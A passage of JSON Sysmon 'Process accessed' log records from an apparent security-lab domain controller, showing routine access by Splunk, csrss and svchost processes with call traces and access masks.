Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.053","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-22A5-5F25-0000-0010A72A1000}","TargetProcessId":"4372","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8421,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.053\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22A5-5F25-0000-0010A72A1000}\r\nTargetProcessId: 4372\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.053","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22A5-5F25-0000-0010A72A1000}","TargetProcessId":"4372","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8422,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8423,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8424,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8425,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8426,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8427,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8428,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:44.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:44.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\